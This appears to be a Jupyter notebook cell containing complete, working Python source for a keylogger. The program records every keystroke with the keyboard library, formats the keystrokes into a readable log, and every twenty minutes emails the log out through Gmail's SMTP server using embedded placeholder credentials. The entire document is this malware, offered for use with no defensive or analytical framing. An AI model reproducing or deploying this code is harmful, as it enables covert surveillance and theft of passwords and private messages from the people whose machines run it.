In [ ]:
#Import Libraries

import keyboard
import smtplib
from threading import Semaphore, Timer

#Set time for Keylog to be sent to email of users choice to 1200 seconds (20 minutes)

SEND_REPORT_EVERY = 1200
EMAIL_ADDRESS = "Example@email.com"
EMAIL_PASSWORD = "Your Password"

#Logs keystrokes and forms a legible and relatively organized Keylog. 

class Keylogger:
    def __init__(self, interval):
        self.interval = interval
        self.log = ""
        self.semaphore = Semaphore(0)

    def callback(self, event):
        name = event.name
        if len(name) > 1:
            # excludes special keys (i.e. control, alt, etc.)
            if name == "space":
                name = " "
            elif name == "enter":
                #Adds a new line after enter is pressed
                name = "[ENTER]\n"
            elif name == "decimal":
                name = "."
            else:
                #replaces spaces with underscores
                name = name.replace(" ", "_")
                name = f"[{name.upper()}]"

        self.log += name
        
    #Sends Keylog to Email Address of users choice. 

    def sendmail(self, email, password, message):
        server = smtplib.SMTP(host="smtp.gmail.com", port=587)
        #Forms connection to the email server via TLS mode for additional security 
        server.starttls()
        #Enters the credentials to email account
        server.login(email, password)
        #Sends actual message
        server.sendmail(email, email, message)
        #Terminates session
        server.quit()

    def report(self):
        #This function sends the keylogs and then resets the "self.log" Variable. 
        if self.log:
            self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
        self.log = ""
        Timer(interval=self.interval, function=self.report).start()

    #Begins the Program. 
    def start(self):
        keyboard.on_release(callback=self.callback)
        self.report()
        self.semaphore.acquire()


if __name__ == "__main__":
    keylogger = Keylogger(interval=SEND_REPORT_EVERY)
    keylogger.start()